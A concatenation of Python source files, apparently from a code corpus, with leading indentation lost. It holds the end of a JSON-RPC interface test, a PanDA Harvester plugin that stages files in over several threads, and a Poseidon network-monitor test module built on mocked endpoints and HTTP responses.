{"method": "getblockcount", "id": 1},
# Request that will fail. The whole batch request should still
# work fine.
{"method": "invalidmethod", "id": 2},
# Another call that should succeed.
{"method": "getblockhash", "id": 3, "params": [0]},
])
result_by_id = {}
for res in results:
result_by_id[res["id"]] = res
assert_equal(result_by_id[1]['error'], None)
assert_equal(result_by_id[1]['result'], 0)
assert_equal(result_by_id[2]['error']['code'], -32601)
assert_equal(result_by_id[2]['result'], None)
assert_equal(result_by_id[3]['error'], None)
assert result_by_id[3]['result'] is not None
def test_http_status_codes(self):
self.log.info("Testing HTTP status codes for JSON-RPC requests...")
expect_http_status(404, -32601, self.nodes[0].invalidmethod)
expect_http_status(500, -8, self.nodes[0].getblockhash, 42)
def test_work_queue_exceeded(self):
self.log.info("Testing work queue exceeded...")
self.restart_node(0, ['-rpcworkqueue=1', '-rpcthreads=1'])
got_exceeded_error = []
threads = []
for _ in range(3):
t = Thread(target=test_work_queue_getblock, args=(self.nodes[0], got_exceeded_error))
t.start()
threads.append(t)
for t in threads:
t.join()
def run_test(self):
self.test_getrpcinfo()
self.test_batch_request()
self.test_http_status_codes()
self.test_work_queue_exceeded()
if __name__ == '__main__':
RPCInterfaceTest().main()
|
pilotmover_mt_preparator.py | import os.path
import os
import threading
import time
from future.utils import iteritems
from pandaharvester.harvestercore import core_utils
from pandaharvester.harvestercore.plugin_base import PluginBase
from pandaharvester.harvestermover import mover_utils
from pilot.api import data
# logger
baseLogger = core_utils.setup_logger('pilotmover_mt_preparator')
# plugin for preparator based on Pilot2.0 Data API, MultipleThreads
# Pilot 2.0 should be deployed as library
# default self.basePath came from preparator section of configuration file
class PilotmoverMTPreparator(PluginBase):
"""
Praparator bring files from remote ATLAS/Rucio storage to local facility.
"""
# constructor
def __init__(self, **kwarg):
self.n_threads = 3
PluginBase.__init__(self, **kwarg)
if self.n_threads < 1:
self.n_threads = 1
# check status
def check_status(self, jobspec):
return True, ''
def stage_in(self, tmpLog, jobspec, files):
tmpLog.debug('To stagein files[] {0}'.format(files))
data_client = data.StageInClient(site=jobspec.computingSite)
allChecked = True
ErrMsg = 'These files failed to download : '
if len(files) > 0:
result = data_client.transfer(files)
tmpLog.debug('pilot.api data.StageInClient.transfer(files) result: {0}'.format(result))
# loop over each file check result all must be true for entire result to be true
if result:
for answer in result:
if answer['errno'] != 0:
allChecked = False
ErrMsg = ErrMsg + (" %s " % answer['name'])
else:
tmpLog.info('Looks like all files already inplace: {0}'.format(files))
# return
tmpLog.debug('stop thread')
if allChecked:
return True, ''
else:
return False, ErrMsg
# trigger preparation
def trigger_preparation(self, jobspec):
# make logger
tmpLog = self.make_logger(baseLogger, 'PandaID={0}'.format(jobspec.PandaID),
method_name='trigger_preparation')
tmpLog.debug('start')
# check that jobspec.computingSite is defined
if jobspec.computingSite is None:
# not found
tmpLog.error('jobspec.computingSite is not defined')
return False, 'jobspec.computingSite is not defined'
else:
tmpLog.debug('jobspec.computingSite : {0}'.format(jobspec.computingSite))
# get input files
files = []
inFiles = jobspec.get_input_file_attributes(skip_ready=True)
# set path to each file
for inLFN, inFile in iteritems(inFiles):
inFile['path'] = mover_utils.construct_file_path(self.basePath, inFile['scope'], inLFN)
tmpLog.debug('To check file: %s' % inFile)
if os.path.exists(inFile['path']):
checksum = core_utils.calc_adler32(inFile['path'])
checksum = 'ad:%s' % checksum
tmpLog.debug('checksum for file %s is %s' % (inFile['path'], checksum))
if 'checksum' in inFile and inFile['checksum'] and inFile['checksum'] == checksum:
tmpLog.debug('File %s already exists at %s' % (inLFN, inFile['path']))
continue
dstpath = os.path.dirname(inFile['path'])
# check if path exists if not create it.
if not os.access(dstpath, os.F_OK):
os.makedirs(dstpath)
files.append({'scope': inFile['scope'],
'name': inLFN,
'destination': dstpath})
tmpLog.debug('files[] {0}'.format(files))
allChecked = True
ErrMsg = 'These files failed to download : '
if files:
threads = []
n_files_per_thread = (len(files) + self.n_threads - 1) / self.n_threads
tmpLog.debug('num files per thread: %s' % n_files_per_thread)
for i in range(0, len(files), n_files_per_thread):
sub_files = files[i:i + n_files_per_thread]
thread = threading.Thread(target=self.stage_in, kwargs={'tmpLog': tmpLog, 'jobspec': jobspec, 'files': sub_files})
threads.append(thread)
[t.start() for t in threads]
while len(threads) > 0:
time.sleep(1)
threads = [t for t in threads if t and t.isAlive()]
tmpLog.info('Checking all files: {0}'.format(files))
for file in files:
if file['errno'] != 0:
allChecked = False
ErrMsg = ErrMsg + (" %s " % file['name'])
# return
tmpLog.debug('stop')
if allChecked:
tmpLog.info('Looks like all files are successfully downloaded.')
return True, ''
else:
return False, ErrMsg
# resolve input file paths
def resolve_input_paths(self, jobspec):
# get input files
inFiles = jobspec.get_input_file_attributes()
# set path to each file
for inLFN, inFile in iteritems(inFiles):
inFile['path'] = mover_utils.construct_file_path(self.basePath, inFile['scope'], inLFN)
# set
jobspec.set_input_file_paths(inFiles)
return True, ''
|
test_poseidonMonitor.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016-2017 In-Q-Tel, Inc, All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Test module for poseidonMonitor.py
Created on 28 June 2016
@author: cglewis, dgrossman, MShel
"""
import json
from prometheus_client import Gauge
from poseidon.baseClasses.Logger_Base import Logger
from poseidon.poseidonMonitor import poseidonMonitor
from poseidon.poseidonMonitor.endPoint import EndPoint
from poseidon.poseidonMonitor.NorthBoundControllerAbstraction.EndpointWrapper import Endpoint_Wrapper
from poseidon.poseidonMonitor.poseidonMonitor import Collector
from poseidon.poseidonMonitor.poseidonMonitor import CTRL_C
from poseidon.poseidonMonitor.poseidonMonitor import Monitor
from poseidon.poseidonMonitor.poseidonMonitor import schedule_job_kickurl
from poseidon.poseidonMonitor.poseidonMonitor import schedule_thread_worker
def test_signal_handler():
class MockLogger:
def __init__(self):
self.logger = Logger.logger
self.poseidon_logger = Logger.poseidon_logger
class MockRabbitConnection:
connection_closed = False
def close(self):
self.connection_closed = True
return True
class MockMonitor(Monitor):
def __init__(self):
self.logger = Logger.logger
self.poseidon_logger = Logger.poseidon_logger
class MockScheduele:
call_log = []
def __init__(self):
self.jobs = ['job1', 'job2', 'job3']
def cancel_job(self, job):
self.call_log.append(job + ' cancelled')
return job + ' cancelled'
mock_monitor = MockMonitor()
mock_monitor.schedule = MockScheduele()
mock_monitor.rabbit_channel_connection_local = MockRabbitConnection()
mock_monitor.logger = MockLogger().logger
# signal handler seem to simply exit and kill all the jobs no matter what
# we pass
mock_monitor.signal_handler(None, None)
assert ['job1 cancelled', 'job2 cancelled',
'job3 cancelled'] == mock_monitor.schedule.call_log
assert True == mock_monitor.rabbit_channel_connection_local.connection_closed
def test_start_vent_collector_faucet():
class MockLogger:
def __init__(self):
self.logger = Logger.logger
self.poseidon_logger = Logger.poseidon_logger
class requests():
def __init__(self):
pass
def post(uri, json, data):
def mock_response(): return None
mock_response.text = 'success'
# cover object
a = mock_response()
assert a is None
assert mock_response.text == 'success'
return mock_response
class FaucetProxy():
def __init__(self):
pass
def check_connection(self):
return True
poseidonMonitor.CTRL_C['STOP'] = False
poseidonMonitor.requests = requests()
class Mock_Update_Switch_State():
def __init__(self):
stuff = dict(
{
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a3': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='NONE'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a4': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='MIRRORING'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a5': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='KNOWN'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a6': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='MIRRORING', next_state='KNOWN'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a7': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='KNOWN', next_state='REINVESTIGATING'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a8': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='SHUTDOWN'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aaa': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='MIRRORING', next_state='NONE'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa1': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='MIRRORING', next_state='NONE'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa2': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='REINVESTIGATING', next_state='NONE'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa3': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='REINVESTIGATING', next_state='NONE')
})
self.endpoints = Endpoint_Wrapper()
for s in stuff:
self.endpoints.state[s] = stuff[s]
self.logger = None
self.sdnc = FaucetProxy()
def return_endpoint_state(self):
return self.endpoints
class MockMonitor(Monitor):
def __init__(self):
self.mod_configuration = dict({
'reinvestigation_frequency': 900,
'collector_nic': 2,
'vent_ip': '0.0.0.0',
'vent_port': '8080',
})
self.logger = Logger.logger
self.poseidon_logger = Logger.poseidon_logger
self.uss = Mock_Update_Switch_State()
mock_monitor = MockMonitor()
mock_monitor.logger = MockLogger().logger
dev_hash = 'test'
num_cuptures = 3
mock_monitor.start_vent_collector(dev_hash, num_cuptures)
def test_start_vent_collector_bcf():
class MockLogger:
def __init__(self):
self.logger = Logger.logger
self.poseidon_logger = Logger.poseidon_logger
class requests():
def __init__(self):
pass
def post(uri, json, data):
def mock_response(): return None
mock_response.text = 'success'
# cover object
a = mock_response()
assert a is None
assert mock_response.text == 'success'
return mock_response
class BCFProxy():
def __init__(self):
pass
def check_connection(self):
return True
poseidonMonitor.CTRL_C['STOP'] = False
poseidonMonitor.requests = requests()
class Mock_Update_Switch_State():
def __init__(self):
stuff = dict(
{
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a3': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='NONE'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a4': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='MIRRORING'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a5': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='KNOWN'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a6': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='MIRRORING', next_state='KNOWN'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a7': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='KNOWN', next_state='REINVESTIGATING'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a8': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='SHUTDOWN'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aaa': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='MIRRORING', next_state='NONE'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa1': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='MIRRORING', next_state='NONE'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa2': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='REINVESTIGATING', next_state='NONE'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa3': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='REINVESTIGATING', next_state='NONE')
})
self.endpoints = Endpoint_Wrapper()
for s in stuff:
self.endpoints.state[s] = stuff[s]
self.logger = None
self.sdnc = BCFProxy()
def return_endpoint_state(self):
return self.endpoints
class MockMonitor(Monitor):
def __init__(self):
self.mod_configuration = dict({
'reinvestigation_frequency': 900,
'collector_nic': 2,
'vent_ip': '0.0.0.0',
'vent_port': '8080',
})
self.logger = Logger.logger
self.poseidon_logger = Logger.poseidon_logger
self.uss = Mock_Update_Switch_State()
mock_monitor = MockMonitor()
mock_monitor.logger = MockLogger().logger
dev_hash = 'test'
num_cuptures = 3
mock_monitor.start_vent_collector(dev_hash, num_cuptures)
def test_not_start_vent_collector_bcf():
class MockLogger:
def __init__(self):
self.logger = Logger.logger
self.poseidon_logger = Logger.poseidon_logger
class requests():
def __init__(self):
pass
def post(uri, json, data):
def mock_response(): return None
mock_response.text = 'success'
# cover object
a = mock_response()
assert a is None
assert mock_response.text == 'success'
return mock_response
class BCFProxy():
def __init__(self):
pass
def check_connection(self):
return False
poseidonMonitor.CTRL_C['STOP'] = False
poseidonMonitor.requests = requests()
class Mock_Update_Switch_State():
def __init__(self):
stuff = dict(
{
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a3': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='NONE'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a4': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='MIRRORING'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a5': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='KNOWN'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a6': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='MIRRORING', next_state='KNOWN'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a7': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='KNOWN', next_state='REINVESTIGATING'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a8': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='SHUTDOWN'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aaa': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='MIRRORING', next_state='NONE'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa1': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='MIRRORING', next_state='NONE'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa2': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='REINVESTIGATING', next_state='NONE'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa3': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='REINVESTIGATING', next_state='NONE')
})
self.endpoints = Endpoint_Wrapper()
for s in stuff:
self.endpoints.state[s] = stuff[s]
self.logger = None
self.sdnc = BCFProxy()
def return_endpoint_state(self):
return self.endpoints
class MockMonitor(Monitor):
def __init__(self):
self.mod_configuration = dict({
'reinvestigation_frequency': 900,
'collector_nic': 2,
'vent_ip': '0.0.0.0',
'vent_port': '8080',
})
self.logger = Logger.logger
self.poseidon_logger = Logger.poseidon_logger
self.uss = Mock_Update_Switch_State()
mock_monitor = MockMonitor()
mock_monitor.logger = MockLogger().logger
dev_hash = 'test'
num_cuptures = 3
mock_monitor.start_vent_collector(dev_hash, num_cuptures)
def test_get_vent_collectors():
class MockLogger:
def __init__(self):
self.logger = Logger.logger
self.poseidon_logger = Logger.poseidon_logger
class requests():
def __init__(self):
pass
def get(self, uri):
def mock_response():
def mock_json():
return json.loads('{"dataset": [{ \
"ip": "10.176.143.99", \
"mac": "20:4c:9e:5f:e3:c4", \
"segment": "to-core-router", \
"port": null, \
"tenant": "EXTERNAL", \
"record_source": "Poseidon", \
"role": "Unknown", \
"os": "Unknown", \
"behavior": 0, \
"hash": "6b961fd660269dd1384605bd439ffb197fd53f0f", \
"state": "KNOWN", \
"active": 1 \
}, \
{ \
"ip": "10.177.0.253", \
"mac": "52:54:00:66:df:67", \
"segment": "prod", \
"port": null, \
"tenant": "ESX", \
"record_source": "Poseidon", \
"role": "Unknown", \
"os": "Unknown", \
"behavior": 0, \
"hash": "b8d31352453a65036b4343f34c2a93f5d5442b70", \
"state": "KNOWN", \
"active": 0 \
}, \
{ \
"ip": "10.176.143.1", \
"mac": "18:66:da:7f:35:60", \
"segment": "to-core-router", \
"port": null, \
"tenant": "EXTERNAL", \
"record_source": "Poseidon", \
"role": "Unknown", \
"os": "Unknown", \
"behavior": 1, \
"hash": "bc3e82c8672ab19e5c3959d8135b873297209ff4", \
"state": "KNOWN", \
"active": 1 \
}]}')
mock_response.json = mock_json
return None
mock_response.text = ("(True, [{'status': u'exited', 'args': [u'enp3s0',"
" u'900', u'd525bec2b05a12af95021337eaa0b20e02b70f3a', u'1', "
"u'host 192.168.0.30'], 'id': u'0bce1351109e'}, {'status': u'exited', "
"'args': [u'enp3s0', u'900', u'97b7edfa648a994467ff0d2f87858a5ea22adaaa', "
"u'1', u'host 192.168.0.20'], 'id': u'c1a662efea1c'}, {'status': u'exited', "
"'args': [u'enp3s0', u'900', u'5a348c8a714c1092c7401decc74dbca5f5749195', "
"u'1', u'host 192.168.0.50'], 'id': u'2602280bb9da'}])")
# cover object
a = mock_response()
b = mock_response.json()
assert a is None
assert isinstance(b, dict)
return mock_response
poseidonMonitor.CTRL_C['STOP'] = False
poseidonMonitor.requests = requests()
class Mock_Update_Switch_State():
def __init__(self):
stuff = dict(
{
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a3': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='NONE'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a4': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='MIRRORING'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a5': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='KNOWN'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a6': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='MIRRORING', next_state='KNOWN'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a7': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='KNOWN', next_state='REINVESTIGATING'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a8': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='SHUTDOWN'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aaa': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='MIRRORING', next_state='NONE'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa1': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='MIRRORING', next_state='NONE'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa2': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='REINVESTIGATING', next_state='NONE'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa3': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='REINVESTIGATING', next_state='NONE')
})
self.endpoints = Endpoint_Wrapper()
for s in stuff:
self.endpoints.state[s] = stuff[s]
self.logger = None
class MockMonitor(Monitor):
def __init__(self):
self.mod_configuration = dict({
'reinvestigation_frequency': 900,
'collector_nic': 2,
'vent_ip': '0.0.0.0',
'vent_port': '8080',
})
self.logger = Logger.logger
self.poseidon_logger = Logger.poseidon_logger
self.uss = Mock_Update_Switch_State()
mock_monitor = MockMonitor()
mock_monitor.logger = MockLogger().logger
result = mock_monitor.get_vent_collectors()
assert isinstance(result, dict)
def test_host_has_active_collectors_false():
class MockLogger:
def __init__(self):
self.logger = Logger.logger
self.poseidon_logger = Logger.poseidon_logger
class requests():
def __init__(self):
pass
def get(self, uri):
def mock_response():
def mock_json():
return json.loads('{"dataset": [{ \
"ip": "10.176.143.99", \
"mac": "20:4c:9e:5f:e3:c4", \
"segment": "to-core-router", \
"port": null, \
"tenant": "EXTERNAL", \
"record_source": "Poseidon", \
"role": "Unknown", \
"os": "Unknown", \
"behavior": 0, \
"hash": "6b961fd660269dd1384605bd439ffb197fd53f0f", \
"state": "KNOWN", \
"active": 1 \
}, \
{ \
"ip": "10.177.0.253", \
"mac": "52:54:00:66:df:67", \
"segment": "prod", \
"port": null, \
"tenant": "ESX", \
"record_source": "Poseidon", \
"role": "Unknown", \
"os": "Unknown", \
"behavior": 0, \
"hash": "b8d31352453a65036b4343f34c2a93f5d5442b70", \
"state": "KNOWN", \
"active": 0 \
}, \
{ \
"ip": "10.176.143.1", \
"mac": "18:66:da:7f:35:60", \
"segment": "to-core-router", \
"port": null, \
"tenant": "EXTERNAL", \
"record_source": "Poseidon", \
"role": "Unknown", \
"os": "Unknown", \
"behavior": 1, \
"hash": "bc3e82c8672ab19e5c3959d8135b873297209ff4", \
"state": "KNOWN", \
"active": 1 \
}]}')
mock_response.json = mock_json
return None
mock_response.text = ("(True, [{'status': u'exited', 'args': [u'enp3s0',"
" u'900', u'test0', u'1', "
"u'host 192.168.0.30'], 'id': u'0bce1351109e'}, {'status': u'exited', "
"'args': [u'enp3s0', u'900', u'test1', "
"u'1', u'host 192.168.0.20'], 'id': u'c1a662efea1c'}, {'status': u'exited', "
"'args': [u'enp3s0', u'900', u'test2', "
"u'1', u'host 192.168.0.50'], 'id': u'2602280bb9da'}])")
# cover object
a = mock_response()
b = mock_response.json()
assert a is None
assert isinstance(b, dict)
return mock_response
poseidonMonitor.CTRL_C['STOP'] = False
poseidonMonitor.requests = requests()
class Mock_Update_Switch_State():
def __init__(self):
stuff = dict(
{
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a3': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='NONE'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a4': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='MIRRORING'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a5': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='KNOWN'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a6': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='MIRRORING', next_state='KNOWN'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a7': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='KNOWN', next_state='REINVESTIGATING'),
'4ee39d254db3e4a5264b75ce8ae312d69f9e73a8': EndPoint({
'ip-address': '10.0.0.101',
'mac': 'f8:b1:56:fe:f2:de',
'segment': 'prod',
'tenant': 'FOO',
'name': None},
prev_state='NONE', state='UNKNOWN', next_state='SHUTDOWN'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aaa': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='MIRRORING', next_state='NONE'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa1': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='MIRRORING', next_state='NONE'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa2': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='REINVESTIGATING', next_state='NONE'),
'd60c5fa5c980b1cd791208eaf62aba9fb46d3aa3': EndPoint({
'ip-address': '10.0.0.99',
'mac': '20:4c:9e:5f:e3:c3',
'segment': 'to-core-router',
'tenant': 'EXTERNAL',
'name': None},
prev_state='NONE', state='REINVESTIGATING', next_state='NONE')
})
self.endpoints = Endpoint_Wrapper()
for s in stuff:
self.endpoints.state[s] = stuff[s]
self.logger = None
class MockMonitor(Monitor):
def __init__(self):
self.mod_configuration = dict({
'reinvestigation_frequency': 900,
'collector_nic': 2,
'vent_ip': '0.0.0.0',
'vent_port': '8080',
})
self.logger = Logger.logger
self.poseidon_logger = Logger.poseidon_logger
self.uss = Mock_Update_Switch_State()
mock_monitor = MockMonitor()
mock_monitor.logger = MockLogger().logger
dev_hash = 'test0'
result = mock_monitor.host_has_active_collectors(dev_hash)
assert result == False
def test_host_has_active_collectors_true():
class MockLogger:
def __init__(self):
self.logger = Logger.logger
self.poseidon_logger = Logger.poseidon_logger
class requests():
def __init__(self):
pass
def get(self, uri):
def mock_response():
def mock_json():
return json.loads('{"dataset": [{ \
